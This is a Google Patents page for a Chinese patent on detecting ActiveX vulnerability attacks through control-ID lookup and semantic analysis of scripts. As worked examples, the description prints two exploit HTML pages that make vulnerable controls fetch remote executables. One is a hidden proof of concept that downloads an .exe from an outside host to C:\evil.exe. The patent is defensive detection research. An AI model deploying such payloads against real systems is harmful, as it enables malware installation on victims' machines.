CN101751530A - 检测漏洞攻击行为的方法及设备 - Google Patents
检测漏洞攻击行为的方法及设备 Download PDFInfo
- Publication number
- CN101751530A CN101751530A CN200910258872A CN200910258872A CN101751530A CN 101751530 A CN101751530 A CN 101751530A CN 200910258872 A CN200910258872 A CN 200910258872A CN 200910258872 A CN200910258872 A CN 200910258872A CN 101751530 A CN101751530 A CN 101751530A
- Authority
- CN
- China
- Prior art keywords
- script sentence
- attack
- semanteme
- leak
- described script
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Links
- 238000000034 method Methods 0.000 title claims abstract description 28
- 206010001488 Aggression Diseases 0.000 title abstract 7
- 230000016571 aggressive behavior Effects 0.000 title abstract 7
- 208000012761 aggressive behavior Diseases 0.000 title abstract 7
- 238000001514 detection method Methods 0.000 claims description 19
- 239000000284 extract Substances 0.000 claims description 8
- 238000012821 model calculation Methods 0.000 claims description 4
- 230000006399 behavior Effects 0.000 abstract description 37
- 238000010586 diagram Methods 0.000 description 9
- 230000008878 coupling Effects 0.000 description 6
- 238000010168 coupling process Methods 0.000 description 6
- 238000005859 coupling reaction Methods 0.000 description 6
- 238000004458 analytical method Methods 0.000 description 5
- 230000008569 process Effects 0.000 description 5
- 238000012360 testing method Methods 0.000 description 5
- 230000006870 function Effects 0.000 description 4
- 230000007704 transition Effects 0.000 description 3
- 235000014510 cooky Nutrition 0.000 description 2
- 238000005516 engineering process Methods 0.000 description 2
- 241001269238 Data Species 0.000 description 1
- 238000012098 association analyses Methods 0.000 description 1
- 230000003542 behavioural effect Effects 0.000 description 1
- 230000000295 complement effect Effects 0.000 description 1
- 238000002347 injection Methods 0.000 description 1
- 239000007924 injection Substances 0.000 description 1
- 230000007246 mechanism Effects 0.000 description 1
- 230000004048 modification Effects 0.000 description 1
- 238000012986 modification Methods 0.000 description 1
- 230000003449 preventive effect Effects 0.000 description 1
- 230000008521 reorganization Effects 0.000 description 1
- 239000000243 solution Substances 0.000 description 1
Images
Landscapes
- Computer And Data Communications (AREA)
Abstract
本发明涉及一种检测漏洞攻击行为的方法及设备,方法包括:查找网络数据中的控件是否为具有漏洞的控件;如果查找结果为是具有漏洞的控件,从所述网络数据中抽取包含所述控件的脚本语句;获取所述脚本语句的语义;根据所述脚本语句的语义判断所述脚本语句中是否存在攻击行为特征;如果判断结果为存在攻击行为特征,则确定所述网络数据中存在漏洞攻击行为。通过对网络数据中的语义状态情况以及行为特征的判断,仍然能够准确检测出存在攻击行为的网络数据,降低了漏洞攻击行为的漏报率及误报率。
Description
技术领域
本发明涉及网络安全技术领域,尤其涉及一种检测漏洞攻击行为的方法及设备。
背景技术
ActiveX是微软引入的基于组件对象模型(Component Object Model,COM)和对象连接与嵌入(Object Linking and Embedding,OLE)的控件。COM组件的开发是为了简化代码的重用,通过建立带有接口的对象,以被其他COM组件以及程序调用。因此,COM组件被广泛用于开发网络浏览器的第三方应用程序即插件。但由于编程方面的原因,ActiveX控件出现越来越多的漏洞。恶意的网站来利用ActiveX控件的漏洞,通过溢出或者是功能代码的注入来侵害个人电脑。这种利用ActiveX控件漏洞侵害个人电脑的行为即ActiveX漏洞攻击行为。
现有技术中,检测ActiveX漏洞攻击行为的方法需要基于规则即控件标识(CLASS ID,Clsid)。具体地,特征检测引擎根据HTTP GET、POST、COOKIE的请求获取HTTP页面的数据流,分析数据流中的的数据包是否与规则匹配,比如,数据流中是否包含可能发起漏洞攻击的控件的Clsid,当包含时,说明该HTTP页面可能会发起ActiveX漏洞攻击行为,则入侵检测系统记入日志,并发出报警;否则,丢弃检测结果,其中,Clsid数据库用于保存可能会发起ActiveX漏洞攻击行为的控件的Clsid。
在实现本发明的过程中,发明人发现:由于Clsid数据库中保存的Clsid只是表示具有该Clsid的网络数据有可能发起ActiveX漏洞攻击行为,并且ActiveX漏洞攻击行为的行为是变化的,因而存在漏报率高、误报率高的问题。
发明内容
本发明实施例提出一种检测漏洞攻击行为的方法及设备,以对ActiveX漏洞攻击行为进行检测,有效提高了漏洞攻击行为检测的准确率,同时降低了漏洞攻击行为检测的漏报率。
本发明实施例提供了一种检测漏洞攻击行为的方法,包括:
查找网络数据中的控件是否为具有漏洞的控件;
如果查找结果为是具有漏洞的控件,从所述网络数据中抽取包含所述控件的脚本语句;
获取所述脚本语句的语义;
根据所述脚本语句的语义判断所述脚本语句中是否存在攻击行为特征;
如果判断结果为存在攻击行为特征,则确定所述网络数据中存在漏洞攻击行为。
本发明实施例还提供了一种检测漏洞攻击行为的设备,包括:
控件检测单元,用于查找网络数据中的控件是否为具有漏洞的控件;
脚本抽取单元,用于在查找结果为具有漏洞的控件的情况下,从所述网络数据中抽取包含所述控件的脚本语句;
语义获取单元,用于获取所述脚本语句的语义;
行为判断单元,用于根据所述脚本语句的语义判断所述脚本语句中是否存在攻击行为特征;
攻击行为确定单元,用于在所述行为判断单元判断结果为存在攻击行为特征的情况下,则确定所述网络数据中存在漏洞攻击行为。
上述实施例提供的技术方案通过对存在漏洞的控件的网络数据进行语义检测及行为匹配,可以对潜在的漏洞攻击行为进行更加深入的分析,也可以排除具有漏洞的控件的正常行为,有效提高了漏洞攻击行为检测的准确率,同时降低了漏洞攻击行为检测的漏报率。
下面通过附图和实施例,对本发明的技术方案做进一步的详细描述。
附图说明
为了更清楚地说明本发明实施例中的技术方案,下面将对实施例中所需要使用的附图作简单地介绍,显而易见地,下面描述中的附图仅仅是本发明的一些实施例,对于本领域普通技术人员来讲,在不付出创造性劳动的前提下,还可以根据这些附图获得其他的附图。
图1为本发明实施例提供的一种检测漏洞攻击行为的方法的流程图;
图2为本发明实施例提供的另一种检测漏洞攻击行为的方法的流程图;
图3为图2所示实施例的分阶段示意图;
图4为图2所示实施例的应用示意图;
图5为图2所示实施例中语义检测的示意图;
图6为第一脚本的语义状态示意图;
图7为第二脚本的语义状态示意图;
图8为本发明实施例提供的检测漏洞攻击行为的设备结构示意图。
具体实施方式
下面将结合本发明实施例中的附图,对本发明实施例中的技术方案进行清楚、完整地描述,显然,所描述的实施例仅仅是本发明一部分实施例,而不是全部的实施例。基于本发明中的实施例,本领域普通技术人员在没有作出创造性劳动前提下所获得的所有其他实施例,都属于本发明保护的范围。
图1为本发明实施例提供的一种检测漏洞攻击行为的方法的流程图。该方法包括:
步骤11、查找网络数据中的控件是否为具有漏洞的控件;如可通过检测并获取网络数据中控件的标识Clsid来查找找网络数据中的控件是否为具有漏洞的控件。在预设的具有漏洞的控件的标识库中查找获取的控件的标识;如果找到,则所述网络数据中的控件为具有漏洞的控件。
步骤12、如果查找结果为是具有漏洞的控件,从所述网络数据中抽取包含所述控件的脚本语句。
步骤13、获取所述脚本语句的语义;例如将所述脚本语句分割为脚本语句块,如按标点符号进行分割;然后根据所述脚本语句块的语义以及所述脚本语句块在脚本语句中的排列顺序判断所述脚本语句的语义,如将所述脚本语句块的语义作为状态参数,按照所述脚本语句块在脚本语句中的排列顺序排列所述状态参数,通过预先设置的模型计算所述脚本语句的语义。具体详见第一脚本、第二脚本的分析说明。
步骤14、根据所述脚本语句的语义判断所述脚本语句中是否存在攻击行为特征;如根据所述脚本语句的语义判断所述脚本语句中是否存在网页重定向的特征。
步骤15、如果判断结果为存在攻击行为特征,则确定所述网络数据中存在漏洞攻击行为。如当所述脚本语句中存在网页重定向的特征时,则确定网络数据中存在攻击行为特征。
本实施例提供的技术方案通过对存在漏洞的控件的网络数据进行语义检测及行为匹配,可以对潜在的漏洞攻击行为进行更加深入的分析,也可以排除具有漏洞的控件的正常行为,有效提高了漏洞攻击行为检测的准确率,同时降低了漏洞攻击行为检测的漏报率。
图2为本发明实施例提供的另一种检测漏洞攻击行为的方法的流程图。该方法包括:
步骤21、检测并获取网络数据如ActiveX脚本中的Clsid的值;
步骤22、在所述Clsid的值为有漏洞的控件对应的Clsid值的情况下,检测所述网络数据的语义状态;
步骤23、判断所述语义状态是否符合存在漏洞攻击行为的网络数据的语义状态转移特征;
步骤24、当所述语义状态符合所述语义状态转移特征时,将导致所述语义状态转移的行为与攻击行为特征进行匹配;
步骤25、根据匹配结果检测所述网络数据是否存在控件漏洞攻击行为。具体地,当导致所述语义状态的行为与攻击行为特征匹配时,则说明所述网络数据存在攻击行为,从而可以执行报警等预防措施;当导致所述语义状态的行为与攻击行为特征不匹配时,则说明所述网络数据不存在攻击行为。
上述步骤21~步骤25可由检测引擎分为两个阶段执行,具体如图3所示。
第一个阶段即上述步骤21,根据HTTP GET、POST、COOKIE的请求获取所请求的HTTP的页面的数据流;检测引擎对数据流进行HTTP解码和HTML解码,将解码得到的数据进行重组,还原成具有一个完整数据包的HTTP的页面。检测引擎对重组得到的HTTP的页面的数据包进行Clsid分析,并利用HMM提取其中的JavaScript脚本,进行语法检测。若数据包中的Clsid值为有漏洞的控件对应的Clsid值,且JavaScript脚本语法正确,则进入第二阶段,检测JavaScript脚本的语义及行为,在语义状态符合预设的语义状态特征,且行为符合攻击行为特征,则进行ActiveX漏洞攻击行为告警,控制台显示报警页面。如图4所示,若数据包中的Clsid值为可直接判定网络数据存在ActiveX漏洞攻击行为的Clsid值,这类Clsid值出现机率较低,则可直接认定检测的网络数据存在ActiveX漏洞攻击行为,从而控制台可直接显示报警页面。
第二阶段即上述步骤22~步骤25,对第一阶段提取的JavaScript脚本进行语义状态检测,以及行为匹配,然后根据攻击行为关联分析和异常值进行打分,最后进行ActiveX漏洞攻击行为报警。其中语义检测具体如图5所示,提取脚本中的语义特征如对象、行为以及该行为的输出,构建语句块序列,即语义状态网络,获取语义状态情况。当语义转移到一个终态时,一个攻击行为即被识别出来。构造ActiveX漏洞攻击行为的检测特征语义状态网络中,可以正则表达式的方式表述特征语义,以自动机机制判断语义状态。
以第一脚本为例:
“<HTML>
<BODY>
<object id=hsmx classid=″clsid:{97AF4A45-49BE-4485-9F55-91AB40F2
88F2}″></object>
<SCRIPT>
function Do_it()
{
File=″http://test.com/file.exe″
hsmx.OpenWebFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_it()type=button value=″exploit″>
</body>
</HTML>”
Clsid值也可以位于网络数据中的脚本中,也可以位于脚本以外的数据中。这里,Clsid值位于脚本中。将第一脚本中的Clsid值:“97AF4A45-49BE-4485-9F55-91AB40F288F2”与Clsid库进行匹配,如果和具有漏洞的控件的标识值相匹配,可知该Clsid值为某一具有漏洞的控件标识。
提取的脚本中,依据回车进行语句块切分。其中函数“Do_it()”为一个语句块。该语句块中,依据回车又可以分为“File=″http://test.com/file.exe”语句块即对象语句块,及“hsmx OpenWebFile(File)”语句块即行为语句块。
提取脚本中的对象语句块“File=″http://test.com/file.exe″”、行为语句块“OpenWebFile(File)”。其中行为语句块调用对象语句块时,通过判断对象中包含有结构头http://,产生网络重定向语句块即行为的输出语句块。利用对象语句块、行为语句块及行为的输出语句块组建语义状态网络或语句块排序,得到如图6所示的语义状态情况。对象“File=″http://test.com/file.exe″”语句块通过行为“OpenWebFile(File)”语句块,得到最终的状态网页重定向语句块。该语句块序列符合存在ActiveX漏洞攻击行为,即网页重定向的JavaScript脚本语义状态特征,且行为“OpenWebFile(File)”与ActiveX攻击行为特征匹配,因此,该第一脚本存在ActiveX漏洞攻击行为。
类似地,第二脚本:“<html>
<body>
<div style=″visibility:hidden;″>
<object classid=′clsid:18A295DA-088E-42D1-BE31-5028D7F9B965′id=′k
upa′></object>
<script type=″text/javascript″>
try{
var obj=document.getElementById(′kupa′);
var rem=″http://www.adalex.pl/motyl/motyl-radio.exe″;
var loc=″C:\evil.exe″;
obj.HttpDownloadFile(rem,loc);
}
catch(err){
window.alert(′Poc failed′);
}
</script>
</div>
</body>
</html>”的语义状态如图7所示,第二脚本的函数“try”语句块中,对象1“′rem′”语句块、对象2“loc”语句块作为行为“HttpDownloadFile()”语句块的输入,由于“rem”包含“http://”的结构头,因而“HttpDownloadFile”执行网络重定向,即产生网页重定向语句块。符合存在ActiveX漏洞攻击行为的JavaScript脚本语义状态特征,且行为“HttpDoenloadFile()”与ActiveX攻击行为特征匹配,因此,该第二脚本存在ActiveX漏洞攻击行为。
本实施例提供的技术方案通过对存在漏洞的控件的网络数据进行语义检测及行为匹配,可以对潜在的漏洞攻击行为进行更加深入的分析,也可以排除具有漏洞的控件的正常行为,有效提高了漏洞攻击行为检测的准确率,同时降低了漏洞攻击行为检测的漏报率。
图8为本发明实施例提供的检测漏洞攻击行为的设备结构示意图。该系统包括:控件检测单元81、脚本抽取单元82、语义获取单元83、行为判断单元84及攻击行为确定单元85。控件检测单元81用于查找网络数据中的控件是否为具有漏洞的控件;脚本抽取单元82用于在查找结果为具有漏洞的控件的情况下,从所述网络数据中抽取包含所述控件的脚本语句;语义获取单元83用于获取所述脚本语句的语义;行为判断单元84用于根据所述脚本语句的语义判断所述脚本语句中是否存在攻击行为特征;攻击行为确定单元85用于在所述行为判断单元判断结果为存在攻击行为特征的情况下,则确定所述网络数据中存在漏洞攻击行为。所述行为判断单元84可用于根据所述脚本语句的语义判断所述脚本语句中是否存在网页重定向的特征,如可具体用于根据所述脚本语句的语义判断所述脚本语句中是否存在“http”字符串。。
本实施例提供的检测漏洞攻击行为的设备通过控件检测单元81对存在漏洞的控件的网络数据进行语义检测及行为匹配,使得当根据Clsid确定控件的方法不能准确判断出该网络数据存在漏洞攻击行为时,以及攻击行为变化时,通过脚本抽取单元82、语义获取单元83、行为判断单元84及攻击行为确定单元85对网络数据中的语义状态情况或者行为特征的判断,仍然能够准确检测出存在攻击行为的网络数据,提高了报警的准确度,降低了漏洞攻击行为的漏报率及误报率。
所述语义获取单元83包括:脚本分割子单元831及语义判断子单元832。脚本分割子单元831用于将所述脚本语句分割为脚本语句块;语义判断子单元832用于根据所述脚本语句块的语义以及所述脚本语句块在脚本语句中的排列顺序判断所述脚本语句的语义。
所述语义判断子单元832包括:参数选定子单元833、参数排列子单元834及语义计算子单元835。参数选定子单元833用于将所述脚本语句块的语义作为状态参数;参数排列子单元834用于按照所述脚本语句块在脚本语句中的排列顺序排列所述状态参数;语义计算子单元835用于通过预先设置的模型计算所述脚本语句的语义。
本发明实施例提供的检测漏洞攻击行为的设备还可包括:报警单元86。报警单元86用于进行漏洞攻击行为报警。当攻击行为确定单元85确定所述网络数据存在攻击行为时,报警单元86进行漏洞攻击行为报警。
上述方法及系统实施例通过对存在漏洞的控件的网络数据进行语义检测及行为匹配,可以对潜在的漏洞攻击行为进行更加深入的分析,也可以排除具有漏洞的控件的正常行为,有效提高了漏洞攻击行为检测的准确率,同时降低了漏洞攻击行为检测的漏报率。
本领域普通技术人员可以理解:实现上述方法实施例的全部或部分步骤可以通过程序指令相关的硬件来完成,前述的程序可以存储于一计算机可读取存储介质中,该程序在执行时,执行包括上述方法实施例的步骤;而前述的存储介质包括:ROM、RAM、磁碟或者光盘等各种可以存储程序代码的介质。
最后应说明的是:以上实施例仅用以说明本发明的技术方案,而非对其限制;尽管参照前述实施例对本发明进行了详细的说明,本领域的普通技术人员应当理解:其依然可以对前述各实施例所记载的技术方案进行修改,或者对其中部分技术特征进行等同替换;而这些修改或者替换,并不使相应技术方案的本质脱离本发明各实施例技术方案的精神和范围。
Claims (10)
1.一种检测漏洞攻击行为的方法,其特征在于,包括:
查找网络数据中的控件是否为具有漏洞的控件;
如果查找结果为是具有漏洞的控件,从所述网络数据中抽取包含所述控件的脚本语句;
获取所述脚本语句的语义;
根据所述脚本语句的语义判断所述脚本语句中是否存在攻击行为特征;
如果判断结果为存在攻击行为特征,则确定所述网络数据中存在漏洞攻击行为。
2.根据权利要求1所述的检测漏洞攻击行为的方法,其特征在于,所述获取所述脚本语句的语义包括:
将所述脚本语句分割为脚本语句块;
根据所述脚本语句块的语义以及所述脚本语句块在脚本语句中的排列顺序判断所述脚本语句的语义。
3.根据权利要求2所述的检测漏洞攻击行为的方法,其特征在于,根据所述脚本语句块的语义以及所述脚本语句块在脚本语句中的排列顺序判断所述脚本语句的语义,包括:
将所述脚本语句块的语义作为状态参数;
按照所述脚本语句块在脚本语句中的排列顺序排列所述状态参数;
通过预先设置的模型计算所述脚本语句的语义。
4.根据权利要求1或2或3所述的检测漏洞攻击行为的方法,其特征在于,根据所述脚本语句的语义判断所述脚本语句中是否存在攻击行为特征,包括:
根据所述脚本语句的语义判断所述脚本语句中是否存在网页重定向的特征。
5.根据权利要求4所述的检测漏洞攻击行为的方法,其特征在于,所述根据所述脚本语句的语义判断所述脚本语句中是否存在网页重定向的特征,包括:
根据所述脚本语句的语义判断所述脚本语句中是否存在“http”字符串。
6.一种检测漏洞攻击行为的设备,其特征在于,包括:
控件检测单元,用于查找网络数据中的控件是否为具有漏洞的控件;
脚本抽取单元,用于在查找结果为具有漏洞的控件的情况下,从所述网络数据中抽取包含所述控件的脚本语句;
语义获取单元,用于获取所述脚本语句的语义;
行为判断单元,用于根据所述脚本语句的语义判断所述脚本语句中是否存在攻击行为特征;
攻击行为确定单元,用于在所述行为判断单元判断结果为存在攻击行为特征的情况下,则确定所述网络数据中存在漏洞攻击行为。
7.根据权利要求6所述的检测漏洞攻击行为的设备,其特征在于,所述语义获取单元包括:
脚本分割子单元,用于将所述脚本语句分割为脚本语句块;
语义判断子单元,用于根据所述脚本语句块的语义以及所述脚本语句块在脚本语句中的排列顺序判断所述脚本语句的语义。
8.根据权利要求7所述的检测漏洞攻击行为的设备,其特征在于,所述语义判断子单元包括:
参数选定子单元,用于将所述脚本语句块的语义作为状态参数;
参数排列子单元,用于按照所述脚本语句块在脚本语句中的排列顺序排列所述状态参数;
语义计算子单元,用于通过预先设置的模型计算所述脚本语句的语义。
9.根据权利要求6至8中任一项所述的检测漏洞攻击行为的设备,其特征在于,所述行为判断单元用于根据所述脚本语句的语义判断所述脚本语句中是否存在网页重定向的特征。
10.根据权利要求9所述的检测漏洞攻击行为的设备,其特征在于,所述行为判断单元具体用于根据所述脚本语句的语义判断所述脚本语句中是否存在“http”字符串。
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN2009102588727A CN101751530B (zh) | 2009-12-29 | 2009-12-29 | 检测漏洞攻击行为的方法及设备 |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN2009102588727A CN101751530B (zh) | 2009-12-29 | 2009-12-29 | 检测漏洞攻击行为的方法及设备 |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN101751530A true CN101751530A (zh) | 2010-06-23 |
| CN101751530B CN101751530B (zh) | 2012-08-22 |
Family
ID=42478502
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN2009102588727A Expired - Fee Related CN101751530B (zh) | 2009-12-29 | 2009-12-29 | 检测漏洞攻击行为的方法及设备 |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN101751530B (zh) |
Cited By (11)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102467631A (zh) * | 2010-11-17 | 2012-05-23 | 财团法人资讯工业策进会 | 计算机蠕虫治疗系统以及方法 |
| CN102833269A (zh) * | 2012-09-18 | 2012-12-19 | 苏州山石网络有限公司 | 跨站攻击的检测方法、装置和具有该装置的防火墙 |
| CN104573486A (zh) * | 2013-10-16 | 2015-04-29 | 深圳市腾讯计算机系统有限公司 | 漏洞检测方法和装置 |
| CN104753730A (zh) * | 2013-12-30 | 2015-07-01 | 腾讯科技(深圳)有限公司 | 一种漏洞检测的方法及装置 |
| CN104881603A (zh) * | 2014-02-27 | 2015-09-02 | 腾讯科技(深圳)有限公司 | 网页重定向漏洞检测方法及装置 |
| CN105426500A (zh) * | 2015-11-25 | 2016-03-23 | 北京奇虎科技有限公司 | 网页脚本动态生成的链接的提取方法及装置 |
| CN106156348A (zh) * | 2016-07-21 | 2016-11-23 | 杭州安恒信息技术有限公司 | 一种数据库对象脚本危险操作的审计方法 |
| CN106778364A (zh) * | 2016-11-22 | 2017-05-31 | 陈曦 | 一种计算机网络安全控制器 |
| WO2020244307A1 (zh) * | 2019-06-06 | 2020-12-10 | 深圳前海微众银行股份有限公司 | 一种漏洞检测方法及装置 |
| CN113079184A (zh) * | 2021-04-29 | 2021-07-06 | 福建奇点时空数字科技有限公司 | 一种基于主机安全层级配置的sdn动目标防御实现方法 |
| CN114679321A (zh) * | 2022-03-29 | 2022-06-28 | 杭州安恒信息技术股份有限公司 | 一种ssti漏洞的检测方法、装置及介质 |
Family Cites Families (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101266550B (zh) * | 2007-12-21 | 2011-02-16 | 北京大学 | 一种恶意代码检测方法 |
-
2009
- 2009-12-29 CN CN2009102588727A patent/CN101751530B/zh not_active Expired - Fee Related
Cited By (18)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102467631B (zh) * | 2010-11-17 | 2014-12-17 | 财团法人资讯工业策进会 | 计算机蠕虫治疗系统以及方法 |
| CN102467631A (zh) * | 2010-11-17 | 2012-05-23 | 财团法人资讯工业策进会 | 计算机蠕虫治疗系统以及方法 |
| CN102833269B (zh) * | 2012-09-18 | 2016-03-30 | 山石网科通信技术有限公司 | 跨站攻击的检测方法、装置和具有该装置的防火墙 |
| CN102833269A (zh) * | 2012-09-18 | 2012-12-19 | 苏州山石网络有限公司 | 跨站攻击的检测方法、装置和具有该装置的防火墙 |
| CN104573486A (zh) * | 2013-10-16 | 2015-04-29 | 深圳市腾讯计算机系统有限公司 | 漏洞检测方法和装置 |
| CN104573486B (zh) * | 2013-10-16 | 2018-09-28 | 深圳市腾讯计算机系统有限公司 | 漏洞检测方法和装置 |
| CN104753730B (zh) * | 2013-12-30 | 2019-01-08 | 腾讯科技(深圳)有限公司 | 一种漏洞检测的方法及装置 |
| CN104753730A (zh) * | 2013-12-30 | 2015-07-01 | 腾讯科技(深圳)有限公司 | 一种漏洞检测的方法及装置 |
| CN104881603B (zh) * | 2014-02-27 | 2018-07-03 | 腾讯科技(深圳)有限公司 | 网页重定向漏洞检测方法及装置 |
| CN104881603A (zh) * | 2014-02-27 | 2015-09-02 | 腾讯科技(深圳)有限公司 | 网页重定向漏洞检测方法及装置 |
| CN105426500A (zh) * | 2015-11-25 | 2016-03-23 | 北京奇虎科技有限公司 | 网页脚本动态生成的链接的提取方法及装置 |
| CN106156348A (zh) * | 2016-07-21 | 2016-11-23 | 杭州安恒信息技术有限公司 | 一种数据库对象脚本危险操作的审计方法 |
| CN106156348B (zh) * | 2016-07-21 | 2019-06-28 | 杭州安恒信息技术股份有限公司 | 一种数据库对象脚本危险操作的审计方法 |
| CN106778364A (zh) * | 2016-11-22 | 2017-05-31 | 陈曦 | 一种计算机网络安全控制器 |
| WO2020244307A1 (zh) * | 2019-06-06 | 2020-12-10 | 深圳前海微众银行股份有限公司 | 一种漏洞检测方法及装置 |
| CN113079184A (zh) * | 2021-04-29 | 2021-07-06 | 福建奇点时空数字科技有限公司 | 一种基于主机安全层级配置的sdn动目标防御实现方法 |
| CN114679321A (zh) * | 2022-03-29 | 2022-06-28 | 杭州安恒信息技术股份有限公司 | 一种ssti漏洞的检测方法、装置及介质 |
| CN114679321B (zh) * | 2022-03-29 | 2024-04-12 | 杭州安恒信息技术股份有限公司 | 一种ssti漏洞的检测方法、装置及介质 |
Also Published As
| Publication number | Publication date |
|---|---|
| CN101751530B (zh) | 2012-08-22 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN101751530B (zh) | 检测漏洞攻击行为的方法及设备 | |
| KR101337874B1 (ko) | 파일 유전자 지도를 이용하여 파일의 악성코드 포함 여부를 판단하는 방법 및 시스템 | |
| CN112307473A (zh) | 一种基于Bi-LSTM网络和注意力机制的恶意JavaScript代码检测模型 | |
| CN108549814A (zh) | 一种基于机器学习的sql注入检测方法、数据库安全系统 | |
| CN107659570A (zh) | 基于机器学习与动静态分析的Webshell检测方法及系统 | |
| CN103365699A (zh) | 基于apk的系统api和运行时字符串提取方法及系统 | |
| CN112817877B (zh) | 异常脚本检测方法、装置、计算机设备和存储介质 | |
| CN104881607A (zh) | 一种基于模拟浏览器行为的xss漏洞检测系统 | |
| CN101799855A (zh) | 一种基于ActiveX组件模拟的网页木马检测方法 | |
| CN111092894A (zh) | 一种基于增量学习的webshell检测方法、终端设备及存储介质 | |
| CN103810428A (zh) | 一种宏病毒检测方法及装置 | |
| US20240241954A1 (en) | Method of detecting android malware based on heterogeneous graph and apparatus thereof | |
| CN107491691A (zh) | 一种基于机器学习的远程取证工具安全分析系统 | |
| CN114398673A (zh) | 应用程序的合规检测方法、装置、存储介质与电子设备 | |
| CN110197072A (zh) | 软件安全漏洞的发掘方法及系统、存储介质和计算机设备 | |
| CN101895517B (zh) | 一种脚本语义提取方法和提取装置 | |
| Xiao et al. | A novel malware classification method based on crucial behavior | |
| KR102516454B1 (ko) | Url 클러스터링을 위한 url의 요약을 생성하는 방법 및 장치 | |
| CN101471781A (zh) | 一种脚本注入事件处理方法和系统 | |
| CN106650450A (zh) | 基于代码指纹识别的恶意脚本启发式检测方法及系统 | |
| CN111125704B (zh) | 一种网页挂马识别方法及系统 | |
| CN110162729B (zh) | 建立浏览器指纹以及识别浏览器类型的方法、装置 | |
| US8935154B1 (en) | Systems and methods for determining authorship of an unclassified notification message | |
| Carpineto et al. | Automatic assessment of website compliance to the European cookie law with CooLCheck | |
| CN113971284A (zh) | 基于JavaScript的恶意网页检测方法、设备及计算机可读存储介质 |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| C06 | Publication | ||
| PB01 | Publication | ||
| C10 | Entry into substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| C14 | Grant of patent or utility model | ||
| GR01 | Patent grant | ||
| C56 | Change in the name or address of the patentee |
Owner name: HUAWEI DIGITAL TECHNOLOGY (CHENGDU) CO., LTD. Free format text: FORMER NAME: CHENGDU HUAWEI SYMANTEC TECHNOLOGIES CO., LTD. |
|
| CP01 | Change in the name or title of a patent holder |
Address after: 611731 Chengdu high tech Zone, Sichuan, West Park, Qingshui River Patentee after: Huawei Symantec Technologies Co., Ltd. Address before: 611731 Chengdu high tech Zone, Sichuan, West Park, Qingshui River Patentee before: Chengdu Huawei Symantec Technologies Co., Ltd. |
|
| CF01 | Termination of patent right due to non-payment of annual fee | ||
| CF01 | Termination of patent right due to non-payment of annual fee |
Granted publication date: 20120822 Termination date: 20191229 |